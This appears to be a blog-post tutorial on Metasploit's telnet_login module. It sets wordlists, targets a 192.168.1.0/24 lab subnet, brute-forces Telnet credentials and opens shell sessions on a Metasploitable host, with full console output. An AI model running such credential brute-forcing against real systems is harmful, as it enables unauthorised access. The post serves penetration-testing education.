The telnet_login module will take a list a provided set of credentials and a range of IP addresses and attempt to login to any Telnet servers it encounters.
msf > use auxiliary/scanner/telnet/telnet_login msf auxiliary(telnet_login) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true yes Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 23 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts
This auxiliary module allows you to pass credentials in a number of ways. You can specifically set a username and password, you can pass a list of usernames and a list of passwords for it to iterate through, or you can provide a file that contains usernames and passwords separated by a space. We will configure the scanner to use a short usernames file and a passwords file and let it run against our subnet.
msf auxiliary(telnet_login) > set BLANK_PASSWORDS false BLANK_PASSWORDS => false msf auxiliary(telnet_login) > set PASS_FILE passwords.txt PASS_FILE => passwords.txt msf auxiliary(telnet_login) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf auxiliary(telnet_login) > set THREADS 254 THREADS => 254 msf auxiliary(telnet_login) > set USER_FILE users.txt USER_FILE => users.txt msf auxiliary(telnet_login) > set VERBOSE false VERBOSE => false msf auxiliary(telnet_login) > run [+] 192.168.1.116 - SUCCESSFUL LOGIN root : s00p3rs3ckret [*] Command shell session 1 opened (192.168.1.101:50017 -> 192.168.1.116:23) at 2010-10-08 06:48:27 -0600 [+] 192.168.1.116 - SUCCESSFUL LOGIN admin : s00p3rs3ckret [*] Command shell session 2 opened (192.168.1.101:41828 -> 192.168.1.116:23) at 2010-10-08 06:48:28 -0600 [*] Scanned 243 of 256 hosts (094% complete) [+] 192.168.1.56 - SUCCESSFUL LOGIN msfadmin : msfadmin [*] Command shell session 3 opened (192.168.1.101:49210 -> 192.168.1.56:23) at 2010-10-08 06:49:07 -0600 [*] Scanned 248 of 256 hosts (096% complete) [*] Scanned 250 of 256 hosts (097% complete) [*] Scanned 255 of 256 hosts (099% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
It seems that our scan has been successful and Metasploit has a few sessions open for us. Let's see if we can interact with one of them.
msf auxiliary(telnet_login) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell TELNET root:s00p3rs3ckret (192.168.1.116:23) 192.168.1.101:50017 -> 192.168.1.116:23 2 shell TELNET admin:s00p3rs3ckret (192.168.1.116:23) 192.168.1.101:41828 -> 192.168.1.116:23 3 shell TELNET msfadmin:msfadmin (192.168.1.56:23) 192.168.1.101:49210 -> 192.168.1.56:23 msf auxiliary(telnet_login) > sessions -i 3 [*] Starting interaction with 3... id id uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) msfadmin@metasploitable:~$ exit exit logout [*] Command shell session 3 closed. msf auxiliary(telnet_login) >
0 Comments:
Post a Comment